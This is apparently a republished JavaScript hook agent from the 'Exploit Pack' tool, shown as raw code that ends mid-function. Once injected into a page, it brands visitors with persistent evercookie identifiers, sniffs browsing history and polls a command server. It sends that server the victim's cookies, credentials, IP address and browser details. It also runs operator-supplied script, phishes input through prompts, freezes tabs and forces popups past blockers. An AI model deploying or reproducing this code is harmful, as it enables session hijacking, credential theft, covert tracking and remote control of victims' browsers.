Vulners
Lucene search
// Exploit Pack server <- Change 127.0.0.1 to your IP address for non-localhost !
var urlServer = "http://127.0.0.1:8000/agent/";
function loadjscssfile(filename, filetype) {
if (filetype == "js") { //if filename is a external JavaScript file
var fileref = document.createElement('script');
fileref.setAttribute("type", "text/javascript");
fileref.setAttribute("src", filename);
} else if (filetype == "css") { //if filename is an external CSS file
var fileref = document.createElement("link");
fileref.setAttribute("rel", "stylesheet");
fileref.setAttribute("type", "text/css");
fileref.setAttribute("href", filename);
}
if (typeof fileref != "undefined")
document.getElementsByTagName("head")[0].appendChild(fileref);
}
// Dynamically load jquery from google
loadjscssfile("http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js", "js");
// Dinamycally load jquerui grom google
loadjscssfile("http://ajax.googleapis.com/ajax/libs/jqueryui/1.10.2/jquery-ui.min.js", "js");
// style="background-color:blue;"
function getChatMessage() {
newChatBox.remove()
if (localStorage.getItem('ExploitPackChat') != null) {
newChatBox.html(localStorage.getItem('ExploitPackChat'));
newChatBox.dialog();
}
}
function setChatMessage(message) {
// Clean chat box
newChatBox.remove()
// Div elevement for the chat box
$(document).ready(function ($) {
var newChatBox = $(document.createElement('div'));
newChatBox.css("color", "black");
newChatBox.css("border", "solid 2px");
newChatBox.css("border-color", "#f00 #f00 #f0a35d #f00");
});
// Store the message
if (localStorage.getItem('ExploitPackChat') != null) {
message = localStorage.getItem('ExploitPackChat') + message + '<br>';
} else {
message = message + '<br>';
}
// Store the message
localStorage.setItem('ExploitPackChat', message);
// Show the dialog
if (localStorage.getItem('ExploitPackChat') != null) {
newChatBox.html(localStorage.getItem('ExploitPackChat'));
newChatBox.dialog();
}
}
// Evercookie Code
// Extremely persistent cookies
/* to turn off CSS history knocking, set _ec_history to 0 */
var _ec_history = 1; // CSS history knocking or not .. can be network intensive
var _ec_tests = 10; //1000;
var _ec_debug = 0;
function _ec_dump(arr, level) {
var dumped_text = "";
if (!level)
level = 0;
//The padding given at the beginning of the line.
var level_padding = "";
for (var j = 0; j < level + 1; j++)
level_padding += " ";
if (typeof (arr) == 'object') { //Array/Hashes/Objects
for (var item in arr) {
var value = arr[item];
if (typeof (value) == 'object') { //If it is an array,
dumped_text += level_padding + "'" + item + "' ...\n";
dumped_text += _ec_dump(value, level + 1);
} else {
dumped_text += level_padding + "'" + item + "' => \"" + value + "\"\n";
}
}
} else { //Stings/Chars/Numbers etc.
dumped_text = "===>" + arr + "<===(" + typeof (arr) + ")";
}
return dumped_text;
}
function _ec_replace(str, key, value) {
if (str.indexOf('&' + key + '=') > -1 || str.indexOf(key + '=') == 0) {
// find start
var idx = str.indexOf('&' + key + '=');
if (idx == -1)
idx = str.indexOf(key + '=');
// find end
var end = str.indexOf('&', idx + 1);
var newstr;
if (end != -1)
newstr = str.substr(0, idx) + str.substr(end + (idx ? 0 : 1)) + '&' + key + '=' + value;
else
newstr = str.substr(0, idx) + '&' + key + '=' + value;
return newstr;
} else
return str + '&' + key + '=' + value;
}
// necessary for flash to communicate with js...
// please implement a better way
var _global_lso;
function _evercookie_flash_var(cookie) {
_global_lso = cookie;
// remove the flash object now
var swf = $('#myswf');
if (swf && swf.parentNode)
swf.parentNode.removeChild(swf);
}
var evercookie = (function () {
this._class = function () {
var self = this;
// private property
_baseKeyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
this._ec = {};
var no_color = -1;
this.get = function (name, cb, dont_reset) {
$(document).ready(function () {
self._evercookie(name, cb, undefined, undefined, dont_reset);
});
}
this.set = function (name, value) {
$(document).ready(function () {
self._evercookie(name, function () { }, value);
});
}
this._evercookie = function (name, cb, value, i, dont_reset) {
if (typeof self._evercookie == 'undefined')
self = this;
if (typeof i == 'undefined')
i = 0;
// first run
if (i == 0) {
self.evercookie_database_storage(name, value);
self.evercookie_png(name, value);
self.evercookie_etag(name, value);
self.evercookie_cache(name, value);
self.evercookie_lso(name, value);
self.evercookie_silverlight(name, value);
self._ec.userData = self.evercookie_userdata(name, value);
self._ec.cookieData = self.evercookie_cookie(name, value);
self._ec.localData = self.evercookie_local_storage(name, value);
self._ec.globalData = self.evercookie_global_storage(name, value);
self._ec.sessionData = self.evercookie_session_storage(name, value);
self._ec.windowData = self.evercookie_window(name, value);
if (_ec_history)
self._ec.historyData = self.evercookie_history(name, value);
}
// when writing data, we need to make sure lso and silverlight object is there
if (typeof value != 'undefined') {
if (
(
(typeof _global_lso == 'undefined') ||
(typeof _global_isolated == 'undefined')
)
&& i++ < _ec_tests
)
setTimeout(function () {
self._evercookie(name, cb, value, i, dont_reset)
}, 300);
}
// when reading data, we need to wait for swf, db, silverlight and png
else {
if (
(
// we support local db and haven't read data in yet
(window.openDatabase && typeof self._ec.dbData == 'undefined') ||
(typeof _global_lso == 'undefined') ||
(typeof self._ec.etagData == 'undefined') ||
(typeof self._ec.cacheData == 'undefined') ||
(document.createElement('canvas').getContext && (typeof self._ec.pngData == 'undefined' || self._ec.pngData == '')) ||
(typeof _global_isolated == 'undefined')
)
&&
i++ < _ec_tests
) {
setTimeout(function () {
self._evercookie(name, cb, value, i, dont_reset)
}, 300);
}
// we hit our max wait time or got all our data
else {
// get just the piece of data we need from swf
self._ec.lsoData = self.getFromStr(name, _global_lso);
_global_lso = undefined;
// get just the piece of data we need from silverlight
self._ec.slData = self.getFromStr(name, _global_isolated);
_global_isolated = undefined;
var tmpec = self._ec;
self._ec = {};
// figure out which is the best candidate
var candidates = new Array();
var bestnum = 0;
var candidate;
for (var item in tmpec) {
if (typeof tmpec[item] != 'undefined' && typeof tmpec[item] != 'null' && tmpec[item] != '' &&
tmpec[item] != 'null' && tmpec[item] != 'undefined' && tmpec[item] != null) {
candidates[tmpec[item]] = typeof candidates[tmpec[item]] == 'undefined' ? 1 : candidates[tmpec[item]] + 1;
}
}
for (var item in candidates) {
if (candidates[item] > bestnum) {
bestnum = candidates[item];
candidate = item;
}
}
// reset cookie everywhere
if (typeof dont_reset == "undefined" || dont_reset != 1)
self.set(name, candidate);
if (typeof cb == 'function')
cb(candidate, tmpec);
}
}
}
this.evercookie_window = function (name, value) {
try {
if (typeof (value) != "undefined")
window.name = _ec_replace(window.name, name, value);
else
return this.getFromStr(name, window.name);
} catch (e) {
}
}
this.evercookie_userdata = function (name, value) {
try {
var elm = this.createElem('div', 'userdata_el', 1);
elm.style.behavior = "url(#default#userData)";
if (typeof (value) != "undefined") {
elm.setAttribute(name, value);
elm.save(name);
} else {
elm.load(name);
return elm.getAttribute(name);
}
} catch (e) {
}
}
this.evercookie_cache = function (name, value) {
if (typeof (value) != "undefined") {
// make sure we have evercookie session defined first
document.cookie = 'evercookie_cache=' + value;
// evercookie_cache.php handles caching
var img = new Image();
img.style.visibility = 'hidden';
img.style.position = 'absolute';
img.src = 'evercookie_cache.php?name=' + name;
} else {
// interestingly enough, we want to erase our evercookie
// http cookie so the php will force a cached response
var origvalue = this.getFromStr('evercookie_cache', document.cookie);
self._ec.cacheData = undefined;
document.cookie = 'evercookie_cache=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
$.ajax({
url: 'evercookie_cache.php?name=' + name,
success: function (data) {
// put our cookie back
document.cookie = 'evercookie_cache=' + origvalue + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
self._ec.cacheData = data;
}
});
}
}
this.evercookie_etag = function (name, value) {
if (typeof (value) != "undefined") {
// make sure we have evercookie session defined first
document.cookie = 'evercookie_etag=' + value;
// evercookie_etag.php handles etagging
var img = new Image();
img.style.visibility = 'hidden';
img.style.position = 'absolute';
img.src = 'evercookie_etag.php?name=' + name;
} else {
// interestingly enough, we want to erase our evercookie
// http cookie so the php will force a cached response
var origvalue = this.getFromStr('evercookie_etag', document.cookie);
self._ec.etagData = undefined;
document.cookie = 'evercookie_etag=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
$.ajax({
url: 'evercookie_etag.php?name=' + name,
success: function (data) {
// put our cookie back
document.cookie = 'evercookie_etag=' + origvalue + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
self._ec.etagData = data;
}
});
}
}
this.evercookie_lso = function (name, value) {
var div = document.getElementById('swfcontainer');
if (!div) {
div = document.createElement("div");
div.setAttribute('id', 'swfcontainer');
document.body.appendChild(div);
}
var flashvars = {};
if (typeof value != 'undefined')
flashvars.everdata = name + '=' + value;
var params = {};
params.swliveconnect = "true";
var attributes = {};
attributes.id = "myswf";
attributes.name = "myswf";
swfobject.embedSWF("evercookie.swf", "swfcontainer", "1", "1", "9.0.0", false, flashvars, params, attributes);
}
this.evercookie_png = function (name, value) {
if (document.createElement('canvas').getContext) {
if (typeof (value) != "undefined") {
// make sure we have evercookie session defined first
document.cookie = 'evercookie_png=' + value;
// evercookie_png.php handles the hard part of generating the image
// based off of the http cookie and returning it cached
var img = new Image();
img.style.visibility = 'hidden';
img.style.position = 'absolute';
img.src = 'evercookie_png.php?name=' + name;
} else {
self._ec.pngData = undefined;
var context = document.createElement('canvas');
context.style.visibility = 'hidden';
context.style.position = 'absolute';
context.width = 200;
context.height = 1;
var ctx = context.getContext('2d');
// interestingly enough, we want to erase our evercookie
// http cookie so the php will force a cached response
var origvalue = this.getFromStr('evercookie_png', document.cookie);
document.cookie = 'evercookie_png=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
var img = new Image();
img.style.visibility = 'hidden';
img.style.position = 'absolute';
img.src = 'evercookie_png.php?name=' + name;
img.onload = function () {
// put our cookie back
document.cookie = 'evercookie_png=' + origvalue + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
self._ec.pngData = '';
ctx.drawImage(img, 0, 0);
// get CanvasPixelArray from given coordinates and dimensions
var imgd = ctx.getImageData(0, 0, 200, 1);
var pix = imgd.data;
// loop over each pixel to get the "RGB" values (ignore alpha)
for (var i = 0, n = pix.length; i < n; i += 4) {
if (pix[i] == 0)
break;
self._ec.pngData += String.fromCharCode(pix[i]);
if (pix[i + 1] == 0)
break;
self._ec.pngData += String.fromCharCode(pix[i + 1]);
if (pix[i + 2] == 0)
break;
self._ec.pngData += String.fromCharCode(pix[i + 2]);
}
}
}
}
}
this.evercookie_local_storage = function (name, value) {
try {
if (window.localStorage) {
if (typeof (value) != "undefined")
localStorage.setItem(name, value);
else
return localStorage.getItem(name);
}
} catch (e) {
}
}
this.evercookie_database_storage = function (name, value) {
try {
if (window.openDatabase) {
var database = window.openDatabase("sqlite_evercookie", "", "evercookie", 1024 * 1024);
if (typeof (value) != "undefined")
database.transaction(function (tx) {
tx.executeSql("CREATE TABLE IF NOT EXISTS cache(" +
"id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, " +
"name TEXT NOT NULL, " +
"value TEXT NOT NULL, " +
"UNIQUE (name)" +
")", [], function (tx, rs) { }, function (tx, err) { });
tx.executeSql("INSERT OR REPLACE INTO cache(name, value) VALUES(?, ?)", [name, value],
function (tx, rs) { }, function (tx, err) { })
});
else {
database.transaction(function (tx) {
tx.executeSql("SELECT value FROM cache WHERE name=?", [name],
function (tx, result1) {
if (result1.rows.length >= 1)
self._ec.dbData = result1.rows.item(0)['value'];
else
self._ec.dbData = '';
}, function (tx, err) { })
});
}
}
} catch (e) {
}
}
this.evercookie_session_storage = function (name, value) {
try {
if (window.sessionStorage) {
if (typeof (value) != "undefined")
sessionStorage.setItem(name, value);
else
return sessionStorage.getItem(name);
}
} catch (e) {
}
}
this.evercookie_global_storage = function (name, value) {
if (window.globalStorage) {
var host = this.getHost();
try {
if (typeof (value) != "undefined")
eval("globalStorage[host]." + name + " = value");
else
return eval("globalStorage[host]." + name);
} catch (e) {
}
}
}
this.evercookie_silverlight = function (name, value) {
/*
* Create silverlight embed
*
* Ok. so, I tried doing this the proper dom way, but IE chokes on appending anything in object tags (including params), so this
* is the best method I found. Someone really needs to find a less hack-ish way. I hate the look of this shit.
*/
var source = "evercookie.xap";
var minver = "4.0.50401.0";
var initParam = "";
if (typeof (value) != "undefined")
initParam = '<param name="initParams" value="' + name + '=' + value + '" />';
var html =
'<object data="data:application/x-silverlight-2," type="application/x-silverlight-2" id="mysilverlight" width="0" height="0">' +
initParam +
'<param name="source" value="' + source + '"/>' +
'<param name="onLoad" value="onSilverlightLoad"/>' +
'<param name="onError" value="onSilverlightError"/>' +
'<param name="background" value="Transparent"/>' +
'<param name="windowless" value="true"/>' +
'<param name="minRuntimeVersion" value="' + minver + '"/>' +
'<param name="autoUpgrade" value="true"/>' +
'<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=' + minver + '" style="text-decoration:none">' +
'<img src="http://go.microsoft.com/fwlink/?LinkId=108181" alt="Get Microsoft Silverlight" style="border-style:none"/>' +
'</a>' +
'</object>';
document.body.innerHTML += html;
}
// public method for encoding
this.encode = function (input) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var i = 0;
input = this._utf8_encode(input);
while (i < input.length) {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
_baseKeyStr.charAt(enc1) + _baseKeyStr.charAt(enc2) +
_baseKeyStr.charAt(enc3) + _baseKeyStr.charAt(enc4);
}
return output;
}
// public method for decoding
this.decode = function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
while (i < input.length) {
enc1 = _baseKeyStr.indexOf(input.charAt(i++));
enc2 = _baseKeyStr.indexOf(input.charAt(i++));
enc3 = _baseKeyStr.indexOf(input.charAt(i++));
enc4 = _baseKeyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = this._utf8_decode(output);
return output;
}
// private method for UTF-8 encoding
this._utf8_encode = function (string) {
string = string.replace(/\r\n/g, "\n");
var utftext = "";
for (var n = 0; n < string.length; n++) {
var c = string.charCodeAt(n);
if (c < 128) {
utftext += String.fromCharCode(c);
} else if ((c > 127) && (c < 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c & 63) | 128);
} else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) & 63) | 128);
utftext += String.fromCharCode((c & 63) | 128);
}
}
return utftext;
}
// private method for UTF-8 decoding
this._utf8_decode = function (utftext) {
var string = "";
var i = 0;
var c = c1 = c2 = 0;
while (i < utftext.length) {
c = utftext.charCodeAt(i);
if (c < 128) {
string += String.fromCharCode(c);
i++;
} else if ((c > 191) && (c < 224)) {
c2 = utftext.charCodeAt(i + 1);
string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
i += 2;
} else {
c2 = utftext.charCodeAt(i + 1);
c3 = utftext.charCodeAt(i + 2);
string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
i += 3;
}
}
return string;
}
// this is crazy but it's 4am in dublin and i thought this would be hilarious
// blame the guinness
this.evercookie_history = function (name, value) {
// - is special
var baseStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=-";
var baseElems = baseStr.split("");
// sorry google.
var url = 'http://www.google.com/evercookie/cache/' + this.getHost() + '/' + name;
if (typeof (value) != "undefined") {
// don't reset this if we already have it set once
// too much data and you can't clear previous values
if (this.hasVisited(url))
return;
this.createIframe(url, 'if');
url = url + '/';
var base = this.encode(value).split("");
for (var i = 0; i < base.length; i++) {
url = url + base[i];
this.createIframe(url, 'if' + i);
}
// - signifies the end of our data
url = url + '-';
this.createIframe(url, 'if_');
} else {
// omg you got csspwn3d
if (this.hasVisited(url)) {
url = url + '/';
var letter = "";
var val = "";
var found = 1;
while (letter != '-' && found == 1) {
found = 0;
for (var i = 0; i < baseElems.length; i++) {
if (this.hasVisited(url + baseElems[i])) {
letter = baseElems[i];
if (letter != '-')
val = val + letter;
url = url + letter;
found = 1;
break;
}
}
}
// lolz
return this.decode(val);
}
}
}
this.createElem = function (type, name, append) {
var el;
if (typeof name != 'undefined' && document.getElementById(name))
el = document.getElementById(name);
else
el = document.createElement(type);
el.style.visibility = 'hidden';
el.style.position = 'absolute';
if (name)
el.setAttribute('id', name);
if (append)
document.body.appendChild(el);
return el;
}
this.createIframe = function (url, name) {
var el = this.createElem('iframe', name, 1);
el.setAttribute('src', url);
return el;
}
// wait for our swfobject to appear (swfobject.js to load)
this.waitForSwf = function (i) {
if (typeof i == 'undefined')
i = 0;
else
i++;
// wait for ~2 seconds for swfobject to appear
if (i < _ec_tests && typeof swfobject == 'undefined')
setTimeout(function () {
waitForSwf(i)
}, 300);
}
this.evercookie_cookie = function (name, value) {
if (typeof (value) != "undefined") {
// expire the cookie first
document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
} else
return this.getFromStr(name, document.cookie);
}
// get value from param-like string (eg, "x=y&name=VALUE")
this.getFromStr = function (name, text) {
if (typeof text != 'string')
return;
var nameEQ = name + "=";
var ca = text.split(/[;&]/);
for (var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0) == ' ')
c = c.substring(1, c.length);
if (c.indexOf(nameEQ) == 0)
return c.substring(nameEQ.length, c.length);
}
}
this.getHost = function () {
var domain = document.location.host;
if (domain.indexOf('www.') == 0)
domain = domain.replace('www.', '');
return domain;
}
this.toHex = function (str) {
var r = "";
var e = str.length;
var c = 0;
var h;
while (c < e) {
h = str.charCodeAt(c++).toString(16);
while (h.length < 2)
h = "0" + h;
r += h;
}
return r;
}
this.fromHex = function (str) {
var r = "";
var e = str.length;
var s;
while (e >= 0) {
s = e - 2;
r = String.fromCharCode("0x" + str.substring(s, e)) + r;
e = s;
}
return r;
}
/*
* css history knocker (determine what sites your visitors have been to)
*
* originally by Jeremiah Grossman
* http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
*
* ported to additional browsers by Samy Kamkar
*
* compatible with ie6, ie7, ie8, ff1.5, ff2, ff3, opera, safari, chrome, flock
*
* - [email protected]
*/
this.hasVisited = function (url) {
if (this.no_color == -1) {
var no_style = this._getRGB("http://samy-was-here-this-should-never-be-visited.com", -1);
if (no_style == -1)
this.no_color =
this._getRGB("http://samy-was-here-" + Math.floor(Math.random() * 9999999) + "rand.com");
}
// did we give full url?
if (url.indexOf('https:') == 0 || url.indexOf('http:') == 0)
return this._testURL(url, this.no_color);
// if not, just test a few diff types if (exact)
return this._testURL("http://" + url, this.no_color) ||
this._testURL("https://" + url, this.no_color) ||
this._testURL("http://www." + url, this.no_color) ||
this._testURL("https://www." + url, this.no_color);
}
/* create our anchor tag */
var _link = this.createElem('a', '_ec_rgb_link');
/* for monitoring */
var created_style;
/* create a custom style tag for the specific link. Set the CSS visited selector to a known value */
var _cssText = '#_ec_rgb_link:visited{display:none;color:#FF0000}';
/* Methods for IE6, IE7, FF, Opera, and Safari */
try {
created_style = 1;
var style = document.createElement('style');
if (style.styleSheet)
style.styleSheet.innerHTML = _cssText;
else if (style.innerHTML)
style.innerHTML = _cssText;
else {
var cssT = document.createTextNode(_cssText);
style.appendChild(cssT);
}
} catch (e) {
created_style = 0;
}
/* if test_color, return -1 if we can't set a style */
this._getRGB = function (u, test_color) {
if (test_color && created_style == 0)
return -1;
/* create the new anchor tag with the appropriate URL information */
_link.href = u;
_link.innerHTML = u;
// not sure why, but the next two appendChilds always have to happen vs just once
document.body.appendChild(style);
document.body.appendChild(_link);
/* add the link to the DOM and save the visible computed color */
var color;
if (document.defaultView)
color = document.defaultView.getComputedStyle(_link, null).getPropertyValue('color');
else
color = _link.currentStyle['color'];
return color;
}
this._testURL = function (url, no_color) {
var color = this._getRGB(url);
/* check to see if the link has been visited if the computed color is red */
if (color == "rgb(255, 0, 0)" || color == "#ff0000")
return 1;
/* if our style trick didn't work, just compare default style colors */
else if (no_color && color != no_color)
return 1;
/* not found */
return 0;
}
};
return _class;
})();
var _global_isolated;
function onSilverlightLoad(sender, args) {
var control = sender.getHost();
_global_isolated = control.Content.App.getIsolatedStorage();
}
function onSilverlightError(sender, args) {
_global_isolated = "";
}
// Detection of Browser and OS
var BrowserDetect = {
init: function () {
this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
this.version = this.searchVersion(navigator.userAgent)
|| this.searchVersion(navigator.appVersion)
|| "an unknown version";
this.OS = this.searchString(this.dataOS) || "an unknown OS";
},
searchString: function (data) {
for (var i = 0; i < data.length; i++) {
var dataString = data[i].string;
var dataProp = data[i].prop;
this.versionSearchString = data[i].versionSearch || data[i].identity;
if (dataString) {
if (dataString.indexOf(data[i].subString) != -1)
return data[i].identity;
} else if (dataProp)
return data[i].identity;
}
},
searchVersion: function (dataString) {
var index = dataString.indexOf(this.versionSearchString);
if (index == -1)
return;
return parseFloat(dataString.substring(index + this.versionSearchString.length + 1));
},
dataBrowser: [
{
string: navigator.userAgent,
subString: "Chrome",
identity: "Google Chrome"
},
{
string: navigator.userAgent,
subString: "OmniWeb",
versionSearch: "OmniWeb/",
identity: "OmniWeb"
},
{
string: navigator.vendor,
subString: "Apple",
identity: "Safari Browser",
versionSearch: "Version"
},
{
prop: window.opera,
identity: "Opera Browser",
versionSearch: "Version"
},
{
string: navigator.vendor,
subString: "iCab",
identity: "iCab"
},
{
string: navigator.vendor,
subString: "KDE",
identity: "Konqueror"
},
{
string: navigator.userAgent,
subString: "Firefox",
identity: "Mozilla Firefox"
},
{
string: navigator.vendor,
subString: "Camino",
identity: "Camino"
},
{// for newer Netscapes (6+)
string: navigator.userAgent,
subString: "Netscape",
identity: "Netscape"
},
{
string: navigator.userAgent,
subString: "MSIE",
identity: "Internet Explorer",
versionSearch: "MSIE"
},
{
string: navigator.userAgent,
subString: "Gecko",
identity: "Mozilla",
versionSearch: "rv"
},
{// for older Netscapes (4-)
string: navigator.userAgent,
subString: "Mozilla",
identity: "Netscape",
versionSearch: "Mozilla"
}
],
dataOS: [
{
string: navigator.platform,
subString: "Win",
identity: "Windows"
},
{
string: navigator.platform,
subString: "Mac",
identity: "Mac"
},
{
string: navigator.userAgent,
subString: "iPhone",
identity: "iPhone/iPod"
},
{
string: navigator.platform,
subString: "Linux",
identity: "Linux"
}
]
};
// Cookie lengh
CookieLen = 15;
// Cookie chars available
CookieChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
// Instance of evercookie
ec = new evercookie();
// Get the cookie if exists
function GetEverCookie() {
var id = this.ec.evercookie_cookie("ZOMBIE");
if (typeof id == 'undefined') {
var id = ec.evercookie_userdata("ZOMBIE");
}
if (typeof id == 'undefined') {
var id = ec.evercookie_window("ZOMBIE");
}
if ((typeof id == 'undefined') || (id == null)) {
id = GenEverCookie();
SetEverCookie(id);
}
return id;
}
// Set the cookie on the browser
function SetEverCookie(id) {
ec.evercookie_cookie("ZOMBIE", id);
ec.evercookie_userdata("ZOMBIE", id);
ec.evercookie_window("ZOMBIE", id);
}
// Generate a new cookie
function GenEverCookie() {
var NewCookie = "";
for (var i = 0; i < this.CookieLen; i++) {
var rand_num = Math.floor(Math.random()
* this.CookieChars.length);
NewCookie += this.CookieChars.charAt(rand_num);
}
return NewCookie;
}
// Log messages
function log(msg) {
setTimeout(function () {
throw new Error(msg);
}, 0);
}
// Instance of browser detection
BrowserDetect.init();
// Temp save MagicIP
var magicEP = "";
// Cookie name
ZOMBIE = GetEverCookie();
// Agent User Name
AgentUN = "jsacco";
var waitingInterval = 5000;
// Call to the server and obtain the commands periodically
var refresh = setInterval(bot_init, waitingInterval);
// Declare var to know if the user is currently typing
var isTyping = false;
// String of keys to capture
var keyString = "";
// Declare Cookie
var CookieID = GetEverCookie();
// Declare Host URL
var sendHostUrl = document.location.hostname;
// Declare Browser name
var sendBrowserName = BrowserDetect.browser;
// Declare Os Type
var sendOSType = navigator.platform;
// Declare credentials
var credentials;
// IP Address
var MyCurrentIP;
// Disable some shits
antiCopyPaste();
// Get the commands trough AJAX
function sendMagic(data) {
console.log('Exploit Pack: Getting data..');
var old = document.getElementById("EPMagic");
if (old !== null) {
old.outerHTML = "";
delete old;
}
var head = document.getElementsByTagName("head")[0];
var script = document.createElement('script');
script.id = 'EPMagic';
script.type = 'text/javascript';
script.src = urlServer + data;
head.appendChild(script);
}
// Get hostname
function getHostname() {
var domain = document.location.host;
if (domain.indexOf('www.') === 0)
domain = domain.replace('www.', '');
return domain;
}
// Startup of doMagic
window.onload = function () {
bot_init();
};
// Obtain IP address and geo localization
function myIP() {
if (window.XMLHttpRequest)
xmlhttp = new XMLHttpRequest();
else
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
xmlhttp.open("GET", "https://api.ipify.org/?format=txt", false);
xmlhttp.send();
return hostipInfo = xmlhttp.responseText.split("\n");
}
// First start, get details and send them to my owner
function bot_init() {
// Disable CACHE
$('head').append('<meta http-equiv="cache-control" content="max-age=0" />');
$('head').append('<meta http-equiv="cache-control" content="no-cache" />');
$('head').append('<meta http-equiv="expires" content="0" />');
$('head').append('<meta http-equiv="expires" content="-1" />');
$('head').append('<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />');
$('head').append('<meta http-equiv="pragma" content="no-cache" />');
// Obtain IP
MyCurrentIP = myIP();
// Send the data for the first time
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + "" + "&" + "0" + '&' + AgentUN + '&' + MyCurrentIP))));
}
// Send Alert
function showAlert(message) {
alert(message);
// Send the response
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + "msg executed" + "&" + "1" + '&' + AgentUN + '&' + MyCurrentIP))));
}
// Control flow
function Flow(statusflow) {
// Send the response
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + statusflow + "&" + "1" + '&' + AgentUN + '&' + MyCurrentIP))));
}
// Dialog Message
function Dialog(message) {
dialogMessage = prompt(message, '');
// Send the response
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + dialogMessage + "&" + "1" + '&' + AgentUN + '&' + MyCurrentIP))));
}
// Send plugins list
function Plugins() {
var plugLength = navigator.plugins.length;
var plugins = "";
for(i=0; i<plugLength; i++){
plugins += (navigator.plugins[i].name);
}
// Send the response
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + plugins + "&" + "1" + '&' + AgentUN + '&' + MyCurrentIP))));
}
// Send screensize
function ScreenSize() {
var screensize = screen.width+" x "+ screen.height;
// Send the response
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + screensize + "&" + "1" + '&' + AgentUN + '&' + MyCurrentIP))));
}
// Get credentials
function getCredentials(credentials) {
// Send the response
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + credentials + "&" + "1" + '&' + AgentUN + '&' + MyCurrentIP))));
}
// Get cookies and send them
function GetSession() {
// Send the response
sendMagic("&"+btoa(unescape(encodeURIComponent( CookieID + "&" + sendHostUrl + "&" + sendBrowserName + "&" + sendOSType + "&" + document.cookie + "&" + "1" + '&' + AgentUN + '&' + MyCurrentIP))));
}
function Freeze() {
while (1) {
setTimeout("location.replace(urlServer + 'Gate/Troyan.aspx');", 0);
}
}
function PersistAggresive() {
setTimeout("location.replace(urlServer + 'Persist/PopUp.aspx?Owner=' + AgentUN);", 0);
return false;
}
function redirectSite(url) {
location.replace('http://' + url);
return false;
}
function execJS(jscode) {
var head = document.getElementsByTagName("head")[0];
var script = document.createElement('script');
script.id = 'EPMagic';
script.type = 'text/javascript';
script.text = jscode;
head.appendChild(script);
return false;
}
function monster() {
$('body').prepend("<center><br><br><br><embed width='100%' height='100%' src='http://www.youtube.com/v/Ye8mB6VsUHw?autoplay=1&cc_load_policy=1' type='application/x-shockwave-flash'></embed></center>");
}
function tabKiller() {
setTimeout("location.replace(urlServer + 'Persist/XSSTest.aspx?Owner=' + AgentUN);", 0);
return false;
}
function PersistOnClick() {
document.cookie = 'oneinone=yes';
function blockError() {
return true;
}
window.onerror = blockError;
//bypass norton internet security popup blocker
if (window.SymRealWinOpen) {
window.open = SymRealWinOpen;
}
if (window.NS_ActualOpen) {
window.open = NS_ActualOpen;
}
var paypopupURL = urlServer + 'Persist/PopUp.aspx?Owner=' + AgentUN;
var usingClick = false;
var popwin = null;
var poped = false;
function gopop() {
if (!poped) {
popwin = window.open(paypopupURL);
poped = true;
self.focus();
}
}
function paypopup() {
if (!poped) {
if (!usingClick) {
popwin = window.open(paypopupURL);
self.focus();
if (popwin) {
poped = true;
}
}
}
if (!poped) {
if (window.Event)
document.captureEvents(Event.CLICK);
document.onclick = gopop;
self.focus();
}
}
